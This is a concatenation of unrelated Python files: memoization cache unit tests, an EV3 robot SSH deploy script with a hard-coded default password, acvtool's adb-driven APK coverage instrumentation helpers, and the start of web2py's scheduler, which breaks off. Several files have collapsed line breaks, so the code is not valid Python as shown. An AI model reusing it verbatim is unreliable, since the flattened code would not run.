exec_times['f7'] += 1 return x @cached(max_size=5, algorithm=CachingAlgorithmFlag.LFU, thread_safe=True) def f8(x): with lock: exec_times['f8'] += 1 return x @cached(max_size=5, algorithm=CachingAlgorithmFlag.FIFO, thread_safe=False, ttl=0.5) def f9(x): exec_times['f9'] += 1 return x @cached(max_size=5, algorithm=CachingAlgorithmFlag.LRU, thread_safe=False, ttl=0.5) def f10(x): exec_times['f10'] += 1 return x @cached(max_size=5, algorithm=CachingAlgorithmFlag.LFU, thread_safe=False, ttl=0.5) def f11(x): exec_times['f11'] += 1 return x ################################################################################ # Test entry point ################################################################################ class TestMemoization(unittest.TestCase): def test_memoization_with_default_arguments(self): for _ in range(5): f1(10) f2(10) f1(20) f2(20) self.assertEqual(exec_times['f1'], 2) self.assertEqual(exec_times['f2'], 2) for info in f1.cache_info(), f2.cache_info(): self.assertIsNone(info.max_size) self.assertEqual(info.algorithm, CachingAlgorithmFlag.LRU) self.assertIsNone(info.ttl) self.assertTrue(info.thread_safe) self.assertEqual(info.hits, 4) self.assertEqual(info.misses, 2) self.assertEqual(info.current_size, 2) for f in f1, f2: keys = make_key((10,), None), make_key((20,), None) for key in keys: self.assertIn(key, f._cache) def test_memoization_with_FIFO(self): self.assertTrue(hasattr(f3, '_fifo_root')) self._fifo_test(f3) f3.cache_clear() self._check_empty_cache_after_clearing(f3) def test_memoization_with_LRU(self): self.assertTrue(hasattr(f4, '_lru_root')) self._lru_test(f4) f4.cache_clear() self._check_empty_cache_after_clearing(f4) def test_memoization_with_LFU(self): self.assertTrue(hasattr(f5, '_lfu_root')) self._lfu_test(f5) self._check_lfu_cache_clearing(f5) def test_memoization_with_FIFO_multithread(self): self.assertTrue(hasattr(f6, '_fifo_root')) self._general_multithreading_test(f6, CachingAlgorithmFlag.FIFO) self._fifo_test(f6) f6.cache_clear() self._check_empty_cache_after_clearing(f6) def test_memoization_with_LRU_multithread(self): self.assertTrue(hasattr(f7, '_lru_root')) self._general_multithreading_test(f7, 
CachingAlgorithmFlag.LRU) self._lru_test(f7) f7.cache_clear() self._check_empty_cache_after_clearing(f7) def test_memoization_with_LFU_multithread(self): self.assertTrue(hasattr(f8, '_lfu_root')) self._general_multithreading_test(f8, CachingAlgorithmFlag.LFU) self._lfu_test(f8) self._check_lfu_cache_clearing(f8) def test_memoization_with_FIFO_TTL(self): self.assertTrue(hasattr(f9, '_fifo_root')) self._general_ttl_test(f9) f9.cache_clear() self._check_empty_cache_after_clearing(f9) def test_memoization_with_LRU_TTL(self): self.assertTrue(hasattr(f10, '_lru_root')) self._general_ttl_test(f10) f10.cache_clear() self._check_empty_cache_after_clearing(f10) def test_memoization_with_LFU_TTL(self): self.assertTrue(hasattr(f11, '_lfu_root')) self._general_ttl_test(f11) self._check_lfu_cache_clearing(f11) def test_memoization_for_unhashable_arguments_with_FIFO(self): self._general_unhashable_arguments_test(f3) f3.cache_clear() self._check_empty_cache_after_clearing(f3) def test_memoization_for_unhashable_arguments_with_LRU(self): self._general_unhashable_arguments_test(f4) f4.cache_clear() self._check_empty_cache_after_clearing(f4) def test_memoization_for_unhashable_arguments_with_LFU(self): self._general_unhashable_arguments_test(f5) self._check_lfu_cache_clearing(f5) def _general_test(self, tested_function, algorithm, hits, misses, in_cache, not_in_cache): # clear exec_times[tested_function.__name__] = 0 tested_function.cache_clear() for i in range(20): tested_function(i) tested_function(99) self.assertEqual(exec_times[tested_function.__name__], 21) info = tested_function.cache_info() self.assertEqual(info.max_size, 5) self.assertEqual(info.algorithm, algorithm) self.assertIsNone(info.ttl) self.assertIsNotNone(info.thread_safe) self.assertEqual(info.hits, 0) self.assertEqual(info.misses, 21) self.assertEqual(info.current_size, 5) keys = [make_key((x,), None) for x in (99, 19, 18, 17, 16)] for key in keys: self.assertIn(key, tested_function._cache) # 10 consecutive calls here tested_function(16) tested_function(17) tested_function(18) tested_function(16) tested_function(17) tested_function(18) tested_function(19) tested_function(15) tested_function(100) tested_function(16) info = tested_function.cache_info() self.assertEqual(info.hits, hits) self.assertEqual(info.misses, misses) self.assertEqual(info.current_size, 5) keys = [make_key((x,), None) for x in in_cache] for key in keys: self.assertIn(key, tested_function._cache) keys = [make_key((x,), None) for x in chain(not_in_cache, range(0, 15))] for key in keys: self.assertNotIn(key, tested_function._cache) def _general_multithreading_test(self, tested_function, algorithm): number_of_keys = 30000 number_of_threads = 4 # clear exec_times[tested_function.__name__] = 0 tested_function.cache_clear() info = tested_function.cache_info() self.assertEqual(info.max_size, 5) self.assertEqual(info.algorithm, algorithm) self.assertIsNone(info.ttl) self.assertTrue(info.thread_safe) self.assertEqual(info.current_size, 0) # Test must-hit def run_must_hit(): keys = list(range(5)) * int(number_of_keys / 5) random.shuffle(keys) for i in keys: tested_function(i) threads = [Thread(target=run_must_hit) for _ in range(number_of_threads)] for thread in threads: thread.start() for thread in threads: thread.join() self.assertGreaterEqual(exec_times[tested_function.__name__], 5) info = tested_function.cache_info() self.assertLessEqual(info.hits, number_of_keys * number_of_threads - 5) self.assertGreaterEqual(info.misses, 5) self.assertEqual(info.current_size, 5) for key in 
[make_key((x,), None) for x in range(5)]: self.assertIn(key, tested_function._cache) # Test can-miss def run_can_miss(): keys = list(range(20)) * int(number_of_keys / 20) random.shuffle(keys) for i in keys: tested_function(i) threads = [Thread(target=run_can_miss) for _ in range(number_of_threads)] for thread in threads: thread.start() for thread in threads: thread.join() executed_times = exec_times[tested_function.__name__] self.assertLessEqual(executed_times, number_of_keys * number_of_threads) self.assertGreaterEqual(executed_times, 20) info = tested_function.cache_info() self.assertGreaterEqual(info.hits, 0) self.assertLessEqual(info.misses, number_of_keys * number_of_threads) self.assertEqual(info.current_size, 5) def _fifo_test(self, tested_function): self._general_test(tested_function=tested_function, algorithm=CachingAlgorithmFlag.FIFO, hits=7, misses=24, in_cache=(16, 100, 15, 99, 19), not_in_cache=(18, 17)) self.assertEqual(exec_times[tested_function.__name__], 24) def _lru_test(self, tested_function): self._general_test(tested_function=tested_function, algorithm=CachingAlgorithmFlag.LRU, hits=7, misses=24, in_cache=(16, 100, 15, 19, 18), not_in_cache=(99, 17)) self.assertEqual(exec_times[tested_function.__name__], 24) def _lfu_test(self, tested_function): self._general_test(tested_function=tested_function, algorithm=CachingAlgorithmFlag.LFU, hits=8, misses=23, in_cache=(18, 17, 16, 19, 100), not_in_cache=(99, 15)) self.assertEqual(exec_times[tested_function.__name__], 23) def _check_empty_cache_after_clearing(self, tested_function): info = tested_function.cache_info() self.assertEqual(info.hits, 0) self.assertEqual(info.misses, 0) self.assertEqual(info.current_size, 0) self.assertEqual(info.max_size, 5) cache = tested_function._cache self.assertEqual(len(cache), 0) def _check_lfu_cache_clearing(self, tested_function): root_next = weakref.ref(tested_function._lfu_root.next) first_cache_head = weakref.ref(tested_function._lfu_root.next.cache_head) self.assertIsNotNone(root_next()) self.assertIsNotNone(first_cache_head()) tested_function.cache_clear() self._check_empty_cache_after_clearing(tested_function) gc.collect() self.assertIsNone(root_next()) self.assertIsNone(first_cache_head()) def _general_ttl_test(self, tested_function): # clear exec_times[tested_function.__name__] = 0 tested_function.cache_clear() arg = 1 key = make_key((arg,), None) tested_function(arg) time.sleep(0.25) # wait for a short time info = tested_function.cache_info() self.assertEqual(info.hits, 0) self.assertEqual(info.misses, 1) self.assertEqual(info.current_size, 1) self.assertIn(key, tested_function._cache) tested_function(arg) # this WILL NOT call the tested function info = tested_function.cache_info() self.assertEqual(info.hits, 1) self.assertEqual(info.misses, 1) self.assertEqual(info.current_size, 1) self.assertIn(key, tested_function._cache) self.assertEqual(exec_times[tested_function.__name__], 1) time.sleep(0.35) # wait until the cache expires info = tested_function.cache_info() self.assertEqual(info.current_size, 1) tested_function(arg) # this WILL call the tested function info = tested_function.cache_info() self.assertEqual(info.hits, 1) self.assertEqual(info.misses, 2) self.assertEqual(info.current_size, 1) self.assertIn(key, tested_function._cache) self.assertEqual(exec_times[tested_function.__name__], 2) def _general_unhashable_arguments_test(self, tested_function): args = ([1, 2, 3], {'this': 'is unhashable'}, ['yet', ['another', ['complex', {'type, ': 'isn\'t it?'}]]]) for arg in args: # 
clear exec_times[tested_function.__name__] = 0 tested_function.cache_clear() key = make_key((arg,), None) tested_function(arg) self.assertIn(key, tested_function._cache) if isinstance(arg, list): arg.append(0) elif isinstance(arg, dict): arg['foo'] = 'bar' else: raise TypeError key = make_key((arg,), None) tested_function(arg) self.assertIn(key, tested_function._cache) if isinstance(arg, list): arg.pop() elif isinstance(arg, dict): del arg['foo'] else: raise TypeError key = make_key((arg,), None) tested_function(arg) self.assertIn(key, tested_function._cache) self.assertEqual(exec_times[tested_function.__name__], 2) info = tested_function.cache_info() self.assertEqual(info.hits, 1) self.assertEqual(info.misses, 2) self.assertEqual(info.current_size, 2) if __name__ == '__main__': unittest.main()
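A small standalone illustration of the API exercised by the tests above: the cached decorator with an LRU policy, plus cache_info() and cache_clear(). The function name and sizes are made up for the example; the decorator arguments and info fields are the same ones used in the test file.

# Sketch: LRU cache of size 2 with a 5-second TTL.
from memoization import cached, CachingAlgorithmFlag

@cached(max_size=2, algorithm=CachingAlgorithmFlag.LRU, ttl=5)
def square(x):
    return x * x

square(2)   # miss -> computed and cached
square(2)   # hit  -> served from the cache
square(3)   # miss
square(4)   # miss -> evicts the least recently used key (2)

info = square.cache_info()
print(info.hits, info.misses, info.current_size)   # expected: 1 3 2
square.cache_clear()                               # empties the cache and resets counters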
ev3deploy.py
import sys
import threading
from pathlib import Path
import fnmatch
import os
import argparse
from paramiko import SSHClient
from scp import SCPClient
from typing import List, Optional, TextIO

SIGKILL = 9
SIGTERM = 15

PATH = './'
EXECUTABLE = ['*.py', '*.sh']
PASSWORD = "maker"
HOSTNAME = "ev3dev"
USERNAME = "robot"
IGNORE_PATH = "./.ignore"
EXECUTE_FILE = None


def read_exclude(ignore_path: str) -> List[str]:
    """
    Read the exclude file ('.ignore').
    :param ignore_path: Path to the exclude file.
    :return: A list of file patterns to ignore.
    """
    if not os.path.exists(Path(ignore_path)):
        ignore = open(Path(ignore_path), 'w+')
        ignore.writelines(['./.ignore\n', './ev3deploy.py\n', '*/.*'])
        ignore.close()
    ignore = open(ignore_path, 'r')
    lines = [line.strip() for line in ignore.readlines()]
    return lines


def match(filename: str, patterns: List[str]) -> bool:
    """
    Checks if filename matches ANY of 'patterns'.
    :param filename: A path of a file.
    :param patterns: A list of standard UNIX file patterns.
    :return: True if filename matches ANY of 'patterns', False otherwise.
    """
    for m in patterns:
        if fnmatch.fnmatch(filename, m):
            return True
    return False


def path_join(*paths) -> Optional[Path]:
    """
    Joins multiple strings to a single Path object.
    :param paths: paths to join.
    :return: A Path object corresponding to 'paths'. 'None' if 'paths' is empty.
    """
    if len(paths) < 1:
        return None
    res = Path(paths[0]).joinpath(*paths[1:])
    return res


def get_args() -> None:
    """
    Configures command line arguments.
    """
    global HOSTNAME, USERNAME, PASSWORD, PATH, IGNORE_PATH, EXECUTE_FILE
    parser = argparse.ArgumentParser(description='Send Project to Ev3.')
    parser.add_argument('--hostname', help="The ssh hostname (default is 'ev3dev')")
    parser.add_argument('--username', help="The ssh username (default is 'robot')")
    parser.add_argument('--password', help="The ssh password (default is 'maker')")
    parser.add_argument('--path', help="The Directory to send (default is current directory).")
    parser.add_argument('--exclude_file',
                        help="The file containing the list of files to ignore (default is '.ignore').")
    parser.add_argument('--execute_file',
                        help="A file to execute after transferring (local path relative to 'PATH').")
    args = parser.parse_args()
    if args.hostname:
        HOSTNAME = args.hostname
    if args.username:
        USERNAME = args.username
    if args.password:
        PASSWORD = args.password
    if args.path:
        PATH = args.path
    if args.exclude_file:
        IGNORE_PATH = args.exclude_file
    if args.execute_file:
        EXECUTE_FILE = args.execute_file


def redirect_stdout_handler(st: TextIO):
    """
    Copies 'st' to system stdout.
    :param st: An output stream.
    """
    for l in iter(st.readline, ""):
        print(l, end="")


def redirect_stderr_handler(st: TextIO):
    """
    Copies 'st' to system stderr.
    :param st: An output stream.
    """
    for l in iter(st.readline, ""):
        print(l, end="", file=sys.stderr)


run_stdin = True


def redirect_stdin_handler(st: TextIO):
    """
    Copies system stdin to 'st'.
    :param st: An input stream.
    """
    global run_stdin
    while run_stdin:
        # if sys.stdin.isatty():
        for line in sys.stdin:
            if st.closed or sys.stdin.closed or not run_stdin:
                break
            print(line, end="", file=st)


def deploy(path: str = './', hostname: str = "ev3dev", username: str = "robot", password: str = "maker",
           execute_file: Optional[str] = None, executable: List[str] = ('*.py',),
           exclude_path: str = "./.ignore", print_console: bool = True,
           redirect_stdout: bool = True, redirect_stderr: bool = True, redirect_stdin: bool = False) -> None:
    """
    Send code to the Ev3.
    :param path: The directory to send (default is the current directory).
    :param hostname: The ssh hostname (default is 'ev3dev').
    :param username: The ssh username (default is 'robot').
    :param password: The ssh password (default is 'maker').
    :param execute_file: A file to run on the ev3 when finished. 'None' to disable.
                         Note: this file must be marked as executable.
    :param executable: A list of patterns of files that should be marked as executable (default is ['*.py']).
    :param exclude_path: The file containing the list of files to ignore (default is '.ignore').
    :param print_console: Should we print info to the console?
    :param redirect_stdout: Should we redirect stdout from the ev3 to the console?
    :param redirect_stderr: Should we redirect stderr from the ev3 to the console?
    :param redirect_stdin: Should we redirect console input to the ev3's stdin?
                           This is disabled by default as it cannot terminate without reading from stdin.
    """
    # Get / set working directory
    if print_console:
        print("CD", path)
    os.chdir(path)
    working_dir = os.getcwd()
    dir_name = os.path.basename(working_dir)
    exclude = read_exclude(exclude_path)

    # Set up ssh
    if print_console:
        print("Starting ssh ...")
    ssh = SSHClient()
    ssh.load_system_host_keys()
    if print_console:
        print("Connecting to", F"{username}@{hostname} ...")
    ssh.connect(hostname=hostname, username=username, password=password)

    with SCPClient(ssh.get_transport()) as scp:
        for subdir, dirs, files in os.walk('.'):
            # for every file in the current working directory:
            for filename in files:
                filepath = subdir + '/' + filename  # full file path (relative to working directory)
                if not match(filepath, exclude):  # the file path does not match any excluded pattern
                    if print_console:
                        print("Sending", Path(filepath), "... ", end='')
                    # create the directory if it does not exist
                    ssh.exec_command('mkdir -p ' + path_join('~', dir_name, subdir).as_posix())
                    # copy the file using scp
                    scp.put(str(path_join(working_dir, filepath)),
                            path_join('~', dir_name, filepath).as_posix())
                    if print_console:
                        print("Sent")
                    if match(filepath, executable):  # the file path matches an executable pattern
                        # mark as executable
                        if print_console:
                            print(path_join('~', dir_name, filepath).as_posix(), "marked as executable.")
                        ssh.exec_command('chmod u+x ' + path_join('~', dir_name, filepath).as_posix())
                else:
                    if print_console:
                        print('Excluding', Path(filepath), '.')

    if execute_file:
        if print_console:
            print(F'\nExecuting {execute_file} ...\n')
        # execute the file.
        stdin, stdout, stderr = ssh.exec_command(path_join('~', dir_name, execute_file).as_posix(),
                                                 get_pty=True)
        # create the redirecting threads
        if redirect_stdout:
            out = threading.Thread(target=redirect_stdout_handler, args=(stdout,))
        if redirect_stderr:
            err = threading.Thread(target=redirect_stderr_handler, args=(stderr,))
        if redirect_stdin:
            child_pid = os.fork()
            if child_pid == 0:
                redirect_stdin_handler(stdin)
                os.kill(os.getpid(), SIGTERM)
            # sin = threading.Thread(target=redirect_stdin_handler, args=(stdin,))
        # start them
        if redirect_stdout:
            out.start()
        if redirect_stderr:
            err.start()
        # if redirect_stdin:
        #     sin.start()
        # wait for them to terminate
        if redirect_stdout:
            out.join()
        if redirect_stderr:
            err.join()
        if redirect_stdin:
            global run_stdin
            # tell redirect_stdin_handler to exit without sending data to stdin
            run_stdin = False
            # sys.stdin.close()
            # sin.join()
            os.kill(child_pid, SIGTERM)

    if print_console:
        print('\nFinished.')


if __name__ == '__main__':
    get_args()
    deploy(path=PATH, hostname=HOSTNAME, username=USERNAME, password=PASSWORD, execute_file=EXECUTE_FILE,
           executable=EXECUTABLE, exclude_path=IGNORE_PATH)
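A short sketch of calling deploy() from another script instead of the CLI entry point above. The host name, project path and executed file below are made-up placeholders; the parameters are exactly those in the deploy() signature.

# Sketch only; values are placeholders.
from ev3deploy import deploy

deploy(path='./my_robot_project',        # directory to copy to the brick
       hostname='ev3dev', username='robot', password='maker',
       execute_file='main.py',           # remote path relative to the project root
       executable=['*.py', '*.sh'],      # files to chmod u+x after copying
       exclude_path='./.ignore',
       redirect_stdout=True, redirect_stderr=True,
       redirect_stdin=False)             # stdin redirection forks; leave off unless needed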
smiler.py
import os import subprocess import re import shutil import threading import signal import logging import time, sched from config import config from granularity import Granularity from instrumenting import manifest_instrumenter from libs.libs import Libs from instrumenting.apkil.smalitree import SmaliTree from instrumenting.apktool_interface import ApktoolInterface from instrumenting.smali_instrumenter import Instrumenter from instrumenting.utils import timeit from instrumenting.utils import Utils apk_info_pattern = re.compile("package: name='(?P<package>.*?)'") CRASH_REPORT_FILENAME = "errors.txt" def install(new_apk_path): logging.info("installing {}".format(os.path.basename(new_apk_path))) cmd = '{} install -r "{}"'.format(config.adb_path, new_apk_path) out = request_pipe(cmd) logging.info(out) def uninstall(package): logging.info("uninstalling") cmd = '{} uninstall "{}"'.format(config.adb_path, package) out = request_pipe(cmd) logging.info(out) def request_pipe(cmd): pipe = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) out, err = pipe.communicate() res = out if not out: res = err if pipe.returncode > 0: raise Exception("----------------------------------------------------\n\ Out: %s\nError: %s" % (out, err)) return res def get_apk_properties(path): info_cmd = "%s dump badging %s" % (config.aapt_path, path) out = request_pipe(info_cmd) matched = re.match(apk_info_pattern, out) package_name = matched.group('package') return apkinfo(package_name, "", "") def get_package_files_list(package_name): cmd = '{} shell ls "/mnt/sdcard/{}/"'.format(config.adb_path, package_name) out = request_pipe(cmd) files = [f for f in out.split() if not f.endswith('/')] return files def get_execution_results(package_name, ec_dir, images_dir): result_files = get_package_files_list(package_name) coverage_files = [f for f in result_files if f.endswith(".ec")] images_files = [f for f in result_files if f.endswith(".png")] crash_file = CRASH_REPORT_FILENAME if CRASH_REPORT_FILENAME in result_files else None if not (coverage_files or crash_file): raise Exception("No coverage or crash report files have been detected on the device for {} package.\n\ Run acvtool with \'-start\' argument to produce coverage.".format(package_name)) Utils.recreate_dir(ec_dir) Utils.recreate_dir(images_dir) pull_files(ec_dir, coverage_files, package_name) pull_files(images_dir, images_files, package_name) if crash_file: pull_files(ec_dir, [crash_file], package_name) def pull_files(dir_name, file_list, package_name): for f in file_list: adb_pull(package_name, f, dir_name) adb_delete_files(package_name, f) def adb_pull(package_name, file_path, pull_to): cmd = "%s pull mnt/sdcard/%s/%s %s" % (config.adb_path, package_name, file_path, os.path.abspath(pull_to)) out = request_pipe(cmd) logging.info(out) def adb_delete_files(package_name, file_name): cmd = "%s shell rm mnt/sdcard/%s/%s" % (config.adb_path, package_name, file_name) out = request_pipe(cmd) def grant_storage_permission(package): read_storage_cmd = "{0} shell pm grant {1} android.permission.READ_EXTERNAL_STORAGE".format(config.adb_path, package) subprocess.call(read_storage_cmd, shell=True) write_storage_cmd = "{0} shell pm grant {1} android.permission.WRITE_EXTERNAL_STORAGE".format(config.adb_path, package) subprocess.call(write_storage_cmd, shell=True) def start_instrumenting(package, release_thread=False, onstop=None, timeout=None): grant_storage_permission(package) lock_thread = "" if release_thread else "-w" cmd = '{} shell am instrument {} 
{}/{}'.format(config.adb_path, lock_thread, package, config.INSTRUMENTING_NAME) if release_thread: os.system(cmd) locked = sdcard_path_exists(package) # dir is created, service started # to be change to another lock file on start timeout = config.default_onstop_timeout if timeout is None else timeout while not locked and timeout: time.sleep(1) logging.info("wait for coverage service activation {}".format(package)) locked = sdcard_path_exists(package) timeout -= 1 if not locked: raise Exception("Coverage service did not start in time ({})".format(package)) return out = '' def run(): out = request_pipe(cmd) logging.info(out) original_sigint = signal.getsignal(signal.SIGINT) def stop(signum, frame): signal.signal(signal.SIGINT, original_sigint) stop_instrumenting(package, timeout) if onstop: onstop() t = threading.Thread(target=run) t.start() print("Press Ctrl+C to finish ...") signal.signal(signal.SIGINT, stop) def sdcard_path_exists(path): cmd = "{} shell \"test -e /mnt/sdcard/{} > /dev/null 2>&1 && echo \'1\' || echo \'0\'\"".format(config.adb_path, path) logging.debug('Command to check lock file:' + cmd) locked = subprocess.check_output(cmd, shell=True).replace("\n","").replace("\r", "") return locked == '1' def coverage_is_locked(package_name): lock_file = "{}.lock".format(package_name) return sdcard_path_exists(lock_file) def stop_instrumenting(package_name, timeout=None): cmd = "{} shell am broadcast -a 'tool.acv.finishtesting'".format(config.adb_path) logging.info("finish testing") result = subprocess.call(cmd, shell=True) logging.info(result) locked = coverage_is_locked(package_name) if timeout is None: timeout = config.default_onstop_timeout while locked and timeout: logging.info("wait until the coverage file is saved {}".format(package_name)) time.sleep(1) locked = coverage_is_locked(package_name) timeout -= 1 files = get_package_files_list(package_name) coverage_files = [f for f in files if f.endswith(".ec")] crash_file = CRASH_REPORT_FILENAME if CRASH_REPORT_FILENAME in files else None logging.info("coverage files at /mnt/sdcard/{0}:".format(package_name)) logging.info("\n".join(coverage_files)) if crash_file: logging.info("crash report /mnt/sdcard/{0}/{1}".format(package_name, crash_file)) def snap(package_name, i=0, output=None): logging.info("ec+screen {}".format(i)) snap_cmd = "{} shell am broadcast -a 'tool.acv.finishtesting'".format(config.adb_path) result = subprocess.call(snap_cmd) if output: if not os.path.exists(output): os.makedirs(output) files = [f for f in get_package_files_list(package_name) if f.endswith(".ec")] pull_files(output, files, package_name) #screens # files = get_package_files_list(package_name) # adb_files_ec_set = [f for f in files if f.endswith('.ec')] # if len(adb_files_ec_set) > 0: # new_ec = adb_files_ec_set[-1] # time_mark = new_ec.split('_')[1][:-3] # logging.info("screen..") # scrn_cmd = "{} shell screencap -p /mnt/sdcard/{}/{}.png".format(config.adb_path, package_name, time_mark) # result = subprocess.call(scrn_cmd) # else: # logging.info("No ec files saved on sdcard.") # return def save_ec_and_screen(package_name, delay=10, output=None, snap_number=722): # 720 per 10s is 2 hours i = 1 logging.info("scheduler: {}, {} sec output: {}".format(package_name, delay, output)) schedule = sched.scheduler(time.time, time.sleep) while i < snap_number: schedule.enter(delay*i, i, snap, (package_name, i, output)) i += 1 schedule.run() @timeit def instrument_apk(apk_path, result_dir, dbg_start=None, dbg_end=None, installation=False, 
granularity=Granularity.default, mem_stats=None, ignore_filter=None, keep_unpacked=False): ''' I assume that the result_dir is empty is checked. ''' apktool = ApktoolInterface(javaPath = config.APKTOOL_JAVA_PATH, javaOpts = config.APKTOOL_JAVA_OPTS, pathApktool = Libs.APKTOOL_PATH, jarApktool = Libs.APKTOOL_PATH) package = get_apk_properties(apk_path).package unpacked_data_path = decompile_apk(apktool, apk_path, package, result_dir) manifest_path = get_path_to_manifest(unpacked_data_path) logging.info("decompiled {0}".format(package)) instrument_manifest(manifest_path) smali_code_path = get_path_to_smali_code(unpacked_data_path) file_name = os.path.basename(apk_path)[:-4] pickle_path = get_pickle_path(file_name, result_dir) instrument_smali_code(smali_code_path, pickle_path, package, granularity, dbg_start, dbg_end, mem_stats, ignore_filter) logging.info("instrumented") instrumented_package_path = get_path_to_instrumented_package(apk_path, result_dir) remove_if_exits(instrumented_package_path) build_apk(apktool, unpacked_data_path, instrumented_package_path) if not keep_unpacked: Utils.rm_tree(unpacked_data_path) logging.info("built") instrumented_apk_path = get_path_to_insrumented_apk(instrumented_package_path, result_dir) sign_align_apk(instrumented_package_path, instrumented_apk_path) logging.info("apk instrumented: {0}".format(instrumented_apk_path)) logging.info("package name: {0}".format(package)) if installation: install(instrumented_apk_path) return (package, instrumented_apk_path, pickle_path) def remove_if_exits(path): if os.path.exists(path): os.remove(path) def build_dir(apktool_dir, result_dir, signature=False, installation=False): apktool = ApktoolInterface(javaPath = config.APKTOOL_JAVA_PATH, javaOpts = config.APKTOOL_JAVA_OPTS, pathApktool = Libs.APKTOOL_PATH, jarApktool = Libs.APKTOOL_PATH) build_pkg_path = os.path.join(result_dir, "build_temp.apk") build_apk(apktool, apktool_dir, build_pkg_path) package = get_apk_properties(build_pkg_path).package result_apk_path = build_pkg_path if signature: result_apk_path = os.path.join(result_dir, "build_{0}.apk".format(package)) sign_align_apk(build_pkg_path, result_apk_path) print('apk was built and signed: {0}'.format(result_apk_path)) else: print('apk was built: {0}'.format(result_apk_path)) if installation: install(result_apk_path) return result_apk_path def decompile_apk(apktool, apk_path, package, result_dir): unpacked_data_path = os.path.join(result_dir, "apktool", package) (run_successful, cmd_output) = apktool.decode(apkPath = apk_path, dirToDecompile = unpacked_data_path, quiet = True, noSrc = False, noRes = False, debug = False, noDebugInfo = False, force = True, #directory exist so without this this process finishes frameworkTag = "", frameworkDir = "", keepBrokenRes = False) if not run_successful: print("Run is not successful!") return unpacked_data_path def get_path_to_manifest(unpacked_data_path): pth = os.path.join(unpacked_data_path, "AndroidManifest.xml") return pth def get_path_to_smali_code(unpacked_data_path): pth = os.path.join(unpacked_data_path, "smali") return pth def get_path_to_instrumentation_metadata_dir(result_dir): pth = os.path.join(result_dir, "metadata") return pth def get_path_to_insrumented_apk(apk_path, result_dir): apk_dir, apk_fname = os.path.split(apk_path) new_apk_fname = "{}_{}".format("instr", apk_fname) pth = os.path.join(result_dir, new_apk_fname) return pth def get_path_to_instrumented_package(apk_path, result_dir): apk_dir, apk_fname = os.path.split(apk_path) path = 
os.path.join(result_dir, apk_fname) return path def get_pickle_path(file_name, result_dir): metadata_dir = get_path_to_instrumentation_metadata_dir(result_dir) return os.path.join(metadata_dir, "{}.pickle".format(file_name)) def instrument_manifest(manifest_path): manifest_instrumenter.instrumentAndroidManifestFile(manifest_path, addSdCardPermission=True) @timeit def instrument_smali_code(input_smali_dir, pickle_path, package, granularity, dbg_start=None, dbg_end=None, mem_stats=None, ignore_filter=None): smali_tree = SmaliTree(input_smali_dir) if ignore_filter: apply_ignore_filter(smali_tree, ignore_filter) smali_instrumenter = Instrumenter(smali_tree, granularity, package, dbg_start, dbg_end, mem_stats) smali_instrumenter.save_instrumented_smali(input_smali_dir) smali_instrumenter.save_pickle(pickle_path) def apply_ignore_filter(smali_tree, ignore_filter): if not os.path.exists(ignore_filter): return with open(ignore_filter, 'r') as f: lines = f.readlines() smali_tree.update_class_ref_dict() for l in lines: parts = l.strip().split('->') klass = parts[0] if klass in smali_tree.class_ref_dict: if len(parts) == 2 and parts[1] in smali_tree.class_ref_dict[klass].meth_ref_dict: smali_tree.class_ref_dict[klass].meth_ref_dict[parts[1]].ignore = True else: smali_tree.class_ref_dict[klass].ignore = True def sign_align_apk(instrumented_package_path, output_apk): aligned_apk_path = instrumented_package_path.replace('.apk', '_signed_tmp.apk') align_cmd = '"{}" -f 4 "{}" "{}"'.format(config.zipalign, instrumented_package_path, aligned_apk_path) request_pipe(align_cmd) apksigner_cmd = '{} sign --ks {} --ks-pass pass:{} --out {} {}'\ .format(config.apksigner_path, config.keystore_path, config.keystore_password, output_apk, aligned_apk_path) request_pipe(apksigner_cmd) os.remove(aligned_apk_path) def build_apk(apktool, apkdata_dir, new_apk_path): apktool.build(srcPath=apkdata_dir, finalApk=new_apk_path, forceAll=True, debug=False) class apkinfo(object): """Properties of the apk file.""" def __init__(self, package=None, sdkversion=None, targetsdkverion=None): self.package = package self.sdkversion = sdkversion self.targetsdkversion = targetsdkverion def __repr__(self): return "%s %s %s" % (self.package, self.sdkversion, self.targetsdkversion)
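A sketch of the typical flow through the helpers above: instrument and install an APK, start and stop the on-device coverage service, then pull the results. The paths are placeholders, and it assumes this file is importable as the module smiler with config already pointing at adb, apktool and apksigner.

# Sketch only; paths are placeholders.
import smiler

package, instr_apk, pickle_path = smiler.instrument_apk(
    'app-debug.apk', 'results/', installation=True)     # decompile, instrument, sign, install

smiler.start_instrumenting(package, release_thread=True)  # waits for the coverage service to start
# ... exercise the app on the device ...
smiler.stop_instrumenting(package)                         # broadcasts 'tool.acv.finishtesting'
smiler.get_execution_results(package, 'results/ec', 'results/img')  # pulls .ec files and screenshots
smiler.uninstall(package)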
scheduler.py
#!/usr/bin/env python # -*- coding: utf-8 -*- """ | This file is part of the web2py Web Framework | Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu> | License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html) Background processes made simple --------------------------------- """ from __future__ import print_function import os import re import time import multiprocessing import sys import threading import traceback import signal import socket import datetime import logging import optparse import tempfile import types from functools import reduce from json import loads, dumps from gluon import DAL, Field, IS_NOT_EMPTY, IS_IN_SET, IS_NOT_IN_DB, IS_EMPTY_OR from gluon import IS_INT_IN_RANGE, IS_DATETIME, IS_IN_DB from gluon.utils import web2py_uuid from gluon._compat import Queue, long, iteritems, PY2 from gluon.storage import Storage USAGE = """ ## Example For any existing app Create File: app/models/scheduler.py ====== from gluon.scheduler import Scheduler def demo1(*args,**vars): print('you passed args=%s and vars=%s' % (args, vars)) return 'done!' def demo2(): 1/0 scheduler = Scheduler(db,dict(demo1=demo1,demo2=demo2)) ## run worker nodes with: cd web2py python web2py.py -K myapp or python gluon/scheduler.py -u sqlite://storage.sqlite \ -f applications/myapp/databases/ \ -t mytasks.py (-h for info) python scheduler.py -h ## schedule jobs using http://127.0.0.1:8000/myapp/appadmin/insert/db/scheduler_task ## monitor scheduled jobs http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_task.id>0 ## view completed jobs http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_run.id>0 ## view workers http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_worker.id>0 """ path = os.getcwd() if 'WEB2PY_PATH' not in os.environ: os.environ['WEB2PY_PATH'] = path IDENTIFIER = "%s#%s" % (socket.gethostname(), os.getpid()) logger = logging.getLogger('web2py.scheduler.%s' % IDENTIFIER) QUEUED = 'QUEUED' ASSIGNED = 'ASSIGNED' RUNNING = 'RUNNING' COMPLETED = 